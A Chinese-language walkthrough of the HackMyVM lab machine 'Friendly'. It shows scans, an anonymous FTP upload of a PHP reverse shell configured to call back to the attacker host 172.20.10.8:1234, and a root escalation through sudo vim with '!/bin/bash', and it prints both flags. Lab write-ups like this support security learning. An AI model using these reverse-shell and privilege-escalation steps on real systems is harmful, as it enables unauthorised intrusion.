文章

Friendly

发表于
作者 9 分钟阅读

Friendly

image-20240414160058193

image-20240414160145145

端口扫描

信息搜集

1

rustscan -a 172.20.10.7 -- -A

1
2
3
4
5
6
7
8
9
10
11
12

Open 172.20.10.7:21
Open 172.20.10.7:80

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
80/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works

目录扫描

1

gobuster dir -u http://172.20.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png

没发现啥东西。。

漏洞扫描

1

nikto -h http://172.20.10.7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.20.10.7
+ Target Hostname:    172.20.10.7
+ Target Port:        80
+ Start Time:         2024-04-14 04:03:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29e5, size: 5f55fa2250a77, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-04-14 04:04:06 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

漏洞发现

踩点

image-20240414160456687

访问敏感端口

使用信息扫描出的结果匿名登录一下,Anonymous FTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

┌──(kali💀kali)-[~/temp/Friendly]
└─$ ftp 172.20.10.7
Connected to 172.20.10.7.
220 ProFTPD Server (friendly) [::ffff:172.20.10.7]
Name (172.20.10.7:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||10902|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 root     root         4096 Mar 11  2023 .
drwxrwxrwx   2 root     root         4096 Mar 11  2023 ..
-rw-r--r--   1 root     root        10725 Feb 23  2023 index.html
226 Transfer complete
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||1376|)
150 Opening BINARY mode data connection for index.html (10725 bytes)
100% |***********************************************************************************************************| 10725       38.30 MiB/s    00:00 ETA
226 Transfer complete
10725 bytes received in 00:00 (8.22 MiB/s)
ftp> exit
221 Goodbye.

image-20240414160946969

上传反弹shell

发现正是主页,尝试上传反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

┌──(kali💀kali)-[~/temp/Friendly]
└─$ head revershell.php 

  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '172.20.10.8';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;
                                                                                                                                                        
┌──(kali💀kali)-[~/temp/Friendly]
└─$ ftp 172.20.10.7          
Connected to 172.20.10.7.
220 ProFTPD Server (friendly) [::ffff:172.20.10.7]
Name (172.20.10.7:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put revershell.php 
local: revershell.php remote: revershell.php
229 Entering Extended Passive Mode (|||28867|)
150 Opening BINARY mode data connection for revershell.php
100% |***********************************************************************************************************|  3909       26.81 MiB/s    00:00 ETA
226 Transfer complete
3909 bytes sent in 00:00 (4.61 MiB/s)
ftp> exit
221 Goodbye.

访问一下http://172.20.10.7/revershell.php触发:

image-20240414161309674

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89

(remote) www-data@friendly:/$ pwd
/
(remote) www-data@friendly:/$ cd /var/www/html
(remote) www-data@friendly:/var/www/html$ ls -la
total 24
drwxrwxrwx 2 root root     4096 Apr 14 04:11 .
drwxr-xr-x 3 root root     4096 Feb 21  2023 ..
-rw-r--r-- 1 root root    10725 Feb 23  2023 index.html
-rw-r--r-- 1 ftp  nogroup  3909 Apr 14 04:11 revershell.php
(remote) www-data@friendly:/var/www/html$ cd ..  
(remote) www-data@friendly:/var/www$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Feb 21  2023 .
drwxr-xr-x 12 root root 4096 Feb 21  2023 ..
drwxrwxrwx  2 root root 4096 Apr 14 04:11 html
(remote) www-data@friendly:/var/www$ cd ..;ls -la
total 48
drwxr-xr-x 12 root root  4096 Feb 21  2023 .
drwxr-xr-x 18 root root  4096 Mar 11  2023 ..
drwxr-xr-x  2 root root  4096 Mar 11  2023 backups
drwxr-xr-x 10 root root  4096 Feb 21  2023 cache
drwxr-xr-x 26 root root  4096 Feb 21  2023 lib
drwxrwsr-x  2 root staff 4096 Sep  3  2022 local
lrwxrwxrwx  1 root root     9 Feb 21  2023 lock -> /run/lock
drwxr-xr-x  8 root root  4096 Apr 14 04:00 log
drwxrwsr-x  2 root mail  4096 Feb 21  2023 mail
drwxr-xr-x  2 root root  4096 Feb 21  2023 opt
lrwxrwxrwx  1 root root     4 Feb 21  2023 run -> /run
drwxr-xr-x  4 root root  4096 Feb 21  2023 spool
drwxrwxrwt  2 root root  4096 Apr 14 04:00 tmp
drwxr-xr-x  3 root root  4096 Feb 21  2023 www
(remote) www-data@friendly:/var$ mail
bash: mail: command not found
(remote) www-data@friendly:/var$ cd backups/
(remote) www-data@friendly:/var/backups$ ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar 11  2023 .
drwxr-xr-x 12 root root 4096 Feb 21  2023 ..
-rw-r--r--  1 root root 8325 Feb 21  2023 apt.extended_states.0
(remote) www-data@friendly:/var/backups$ cd /home
(remote) www-data@friendly:/home$ ls -la
total 12
drwxr-xr-x  3 root    root    4096 Feb 21  2023 .
drwxr-xr-x 18 root    root    4096 Mar 11  2023 ..
drwxr-xr-x  5 RiJaba1 RiJaba1 4096 Mar 11  2023 RiJaba1
(remote) www-data@friendly:/home$ cd RiJaba1/
(remote) www-data@friendly:/home/RiJaba1$ ls -la
ctotal 24
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11  2023 .
drwxr-xr-x 3 root    root    4096 Feb 21  2023 ..
lrwxrwxrwx 1 RiJaba1 RiJaba1    9 Feb 23  2023 .bash_history -> /dev/null
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11  2023 CTF
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11  2023 Private
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21  2023 YouTube
-r--r--r-- 1 RiJaba1 RiJaba1   33 Mar 11  2023 user.txt
(remote) www-data@friendly:/home/RiJaba1$ cat user.txt 
b8cff8c9008e1c98a1f2937b4475acd6
(remote) www-data@friendly:/home/RiJaba1$ ls -F
CTF/  Private/  YouTube/  user.txt
(remote) www-data@friendly:/home/RiJaba1$ cd CTF 
(remote) www-data@friendly:/home/RiJaba1/CTF$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11  2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11  2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1   21 Mar 11  2023 ...
(remote) www-data@friendly:/home/RiJaba1/CTF$ cd ...
bash: cd: ...: Not a directory
(remote) www-data@friendly:/home/RiJaba1/CTF$ ls -F
(remote) www-data@friendly:/home/RiJaba1/CTF$ file ...
...: ASCII text
(remote) www-data@friendly:/home/RiJaba1/CTF$ cat ...
How did you find me?
(remote) www-data@friendly:/home/RiJaba1/CTF$ cd ..
(remote) www-data@friendly:/home/RiJaba1$ cd Private/
(remote) www-data@friendly:/home/RiJaba1/Private$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11  2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11  2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1   45 Mar 11  2023 targets.txt
(remote) www-data@friendly:/home/RiJaba1/Private$ cat targets.txt 
U2hlbGxEcmVkZAp4ZXJvc2VjCnNNTApib3lyYXMyMDAK
(remote) www-data@friendly:/home/RiJaba1/Private$ cd ../YouTube/
(remote) www-data@friendly:/home/RiJaba1/YouTube$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21  2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11  2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1   41 Feb 21  2023 ideas.txt
(remote) www-data@friendly:/home/RiJaba1/YouTube$ cat ideas.txt 
What're you reading? Have you hacked me?

尝试解码一下字符串:

image-20240414161634052

什么玩意:

image-20240414161824794

继续信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

(remote) www-data@friendly:/home/RiJaba1/YouTube$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
(remote) www-data@friendly:/home/RiJaba1/YouTube$ sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim

尝试提权:

打开vim以后,输入命令!/bin/bash即可执行!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

(remote) www-data@friendly:/home/RiJaba1/YouTube$ sudo /usr/bin/vim

root@friendly:/home/RiJaba1/YouTube# cd /root
root@friendly:~# ls -la
total 28
drwx------  3 root root 4096 Mar 11  2023 .
drwxr-xr-x 18 root root 4096 Mar 11  2023 ..
lrwxrwxrwx  1 root root    9 Feb 23  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Feb 21  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-r-xr-xr-x  1 root root  509 Mar 11  2023 interfaces.sh
-r--------  1 root root   24 Mar 11  2023 root.txt
root@friendly:~# cat interfaces.sh 
#!/bin/bash

# By RiJaba1

interfaces=$(ip link | awk -F: '$0 !~ "lo|vir|^[^0-9]"{print $2}')

new_interfaces=""
for interface in $interfaces; do
    if ! grep -q "^iface $interface" /etc/network/interfaces; then
        echo "" >> /etc/network/interfaces
        echo "auto $interface" >> /etc/network/interfaces
        echo "iface $interface inet dhcp" >> /etc/network/interfaces
        new_interfaces="$new_interfaces $interface"
    fi
done

if [ -n "$new_interfaces" ]; then
    sleep 15
    reboot
fi
root@friendly:~# cat root.txt 
Not yet! Find root.txt.

额,还没有发现flag。。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root@friendly:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a2:9f:c0 brd ff:ff:ff:ff:ff:ff
    inet 172.20.10.7/28 brd 172.20.10.15 scope global dynamic enp0s3
       valid_lft 85094sec preferred_lft 85094sec
    inet6 fe80::a00:27ff:fea2:9fc0/64 scope link 
       valid_lft forever preferred_lft forever
root@friendly:~# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
root@friendly:~# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f

找到flag!!!!

Training platform, Hackmyvm
Hackmyvm web
本文由作者按照 CC BY 4.0 进行授权